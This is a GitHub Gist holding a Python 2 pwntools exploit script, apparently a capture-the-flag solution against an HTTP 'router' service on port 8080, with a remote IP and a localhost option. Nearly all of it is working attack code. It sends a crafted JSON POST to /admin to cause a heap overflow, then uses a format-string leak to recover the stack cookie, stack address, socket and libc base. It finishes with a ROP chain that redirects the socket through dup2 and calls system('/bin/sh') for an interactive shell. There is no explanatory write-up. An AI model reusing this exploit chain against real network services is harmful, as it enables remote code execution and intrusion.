Created
October 8, 2017 16:10
-
-
Save bennofs/cce01eefbaa4a80a59910b87478fb366 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
from pwn import * | |
exe = context.binary = ELF("./router") | |
libc = ELF("./libc.so") if args.REMOTE else exe.libc | |
got_end_chunk = 0x60f185 | |
data_offset = 0x10 + 1 | |
def heap_overflow(target_chunk, target_size, data, json="", p=False): | |
conn = remote("51.15.88.183", 8080) if args.REMOTE else remote("localhost", 8080) | |
if p: | |
pause() | |
filler = 0x50 if target_size != 0x50 else 0x40 | |
objsize = "o" * 0x20 | |
small1 = "x" * 0x10 | |
small2 = "c" * (filler - 0x10) | |
small3 = "d" * (target_size - 0x10) | |
overflow = small2.replace("c", "e")[:-1] + "\x7f" + fit({ | |
0x8: target_size | 0x1, | |
0x10: target_chunk, | |
}) | |
write_nothing = "\ud8ff\uffff" | |
padding = write_nothing * ((target_size - 0x10) / 10) | |
padding += "\x7f" | |
data = padding + data | |
payload = ''' | |
{ "%(objsize)s": "%(objsize)s"1 | |
0: "%(small2)s" | |
0: "%(small3)s" | |
0: "%(overflow)s" | |
"%(small3)s": 0, | |
0: "%(data)s", | |
%(json)s | |
}''' % locals() | |
request = ''' | |
POST /admin HTTP/1.1 | |
Host: aaa | |
Content-Type: application/json | |
Cookie: sessionid=0b71662a3b766be303db07f68a0f497090a7e15060eac6a75aab6643c74b15c9 | |
Content-Length: {} | |
{} | |
'''.strip().replace("\n", "\r\n").format(len(payload), payload) | |
conn.send(request) | |
return conn | |
def do_printf(s, arg=0xdeadbeef): | |
data_start = got_end_chunk + data_offset | |
data = fit({ | |
(exe.symbols.body_template - data_start): data_start + 0x100, | |
(exe.symbols.success_settings_saved - data_start): arg, | |
(exe.symbols.http200ok_content - data_start): data_start + 0x100 - 8, | |
(exe.symbols.settings_template - data_start): 0x40BEF8, | |
0x100 - 8: "%2$s\0", | |
0x100: s + "\0", | |
}) | |
return heap_overflow(got_end_chunk, 0x70, data, json=''' | |
"ssid": "", | |
"bssid": "", | |
"dns": "" | |
''') | |
@MemLeak | |
@context.quiet | |
def leak(addr): | |
if addr < 0x400000: return None | |
if '"' in p64(addr): return None | |
with do_printf("%sENDOFDATA\n", addr) as c: | |
return c.recvuntil("ENDOFDATA\n", drop=True) + "\0" | |
c = do_printf("%19$llx\n") | |
cookie = int(c.recvline(), 16) | |
success("stack cookie: %#x", cookie) | |
c.close() | |
with do_printf("%22$llx\n") as c: | |
stack_leak = int(c.recvline(), 16) | |
success("stack leak: %#x", stack_leak) | |
with do_printf("%sENDDATA\n", stack_leak + 0x5c) as c: | |
socket = u32(c.recvuntil("ENDDATA\n", drop=True).ljust(4, "\0")) | |
success("socket: %d", socket) | |
libc.address += leak.u64(exe.got.fwrite) - libc.symbols.fwrite | |
pop_rdi = 0x000000000040a0f3 # pop rdi; ret | |
pop_rsi = 0x000000000040a0f1 # pop rsi; pop r15; ret | |
stack_chunk = stack_leak - 0x28 | |
payload = fit({ | |
0x20 - data_offset: [ | |
cookie, | |
p64(0xdeadba5e), | |
pop_rdi, | |
p64(socket), | |
pop_rsi, | |
p64(0x1), | |
p64(0x1), | |
p64(libc.symbols.dup2), | |
pop_rdi, | |
p64(socket), | |
pop_rsi, | |
p64(0x2), | |
p64(0x2), | |
p64(libc.symbols.dup2), | |
pop_rdi, | |
p64(socket), | |
pop_rsi, | |
p64(0x0), | |
p64(0x0), | |
p64(libc.symbols.dup2), | |
pop_rdi, | |
p64(stack_chunk + 0x100), | |
p64(libc.symbols.system), | |
pop_rdi, | |
p64(0x0), | |
p64(libc.symbols.exit), | |
], | |
0x100 - data_offset: "/bin/sh\n\0", | |
}) | |
with heap_overflow(stack_chunk, 0x40, payload, json= "0: 0") as c: | |
c.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment